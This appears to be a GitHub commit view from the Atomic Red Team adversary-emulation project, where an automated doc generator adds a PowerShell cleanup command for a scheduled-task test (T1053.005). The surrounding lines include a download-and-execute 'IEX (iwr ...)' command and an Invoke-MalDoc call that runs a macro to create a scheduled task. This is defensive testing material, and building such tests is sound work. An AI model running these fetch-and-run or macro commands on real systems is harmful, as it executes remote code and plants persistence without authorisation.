Generated docs from job=generate-docs branch=master [ci skip]

This commit is contained in:
Atomic Red Team doc generator
2023-01-12 15:41:02 +00:00
parent 0319b78111
commit 690097dc5d
2 changed files with 7 additions and 3 deletions
+4
View File
@@ -212,6 +212,10 @@ IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/a
Invoke-MalDoc -macroFile "PathToAtomicsFolder\T1053.005\src\T1053.005-macrocode.txt" -officeProduct "#{ms_product}" -sub "Scheduler"
```
#### Cleanup Commands:
```powershell
Unregister-ScheduledTask -TaskName "Run Notepad" -Confirm:$false
```